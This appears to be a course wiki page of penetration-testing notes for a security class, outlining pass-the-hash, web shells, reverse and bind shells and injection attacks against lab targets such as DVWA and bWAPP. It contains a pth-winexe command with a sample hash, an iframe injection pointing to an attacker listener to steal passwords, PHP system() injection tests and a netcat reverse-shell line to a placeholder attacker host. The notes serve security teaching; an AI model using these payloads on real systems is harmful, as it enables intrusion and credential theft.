Pentest Objectives - Paiet/SEC-335 GitHub Wiki

Password cracking
Pass the hash
- export SMBHASH=EMPTY-LM-HASH:HASH
  - AAD3B435B51404EEAAD3B435B51404EE:A0C472FF1EF63D13F12F347B02CAC336
- pth-winexe -U Administrator% //10.0.0.168 cmd
Proxying a connection
Uploading a web shell
- Gives a convenient dashboard for access and control
- Obfuscation methods
  - Fake 404 page
- DEMO: http://10.0.0.165/dvwa/vulnerabilities/exec/weblib.php
  - Must be LOGGED IN to DVWA
Setting up a bind shell
Getting a reverse shell
Injections
- SQL
- HTML
  - Testing
    - <font color="blue"><b>H@ck3r!</b></font>
    - <iframe src="http://10.0.0.186:8888/bogus" height="0" width="0">
    - Steal password with demo-http-login.txt on Kali /root/Tools
- Command
  - Leverages existing code/commands
- Code
  - Leverages coding language
    - DEMO: PHP Code Injection on BWAPP
      - Test with
        
        phpinfo()
        
        system("whomai")
        
        nc -nv attackerIP port -e /bin/bash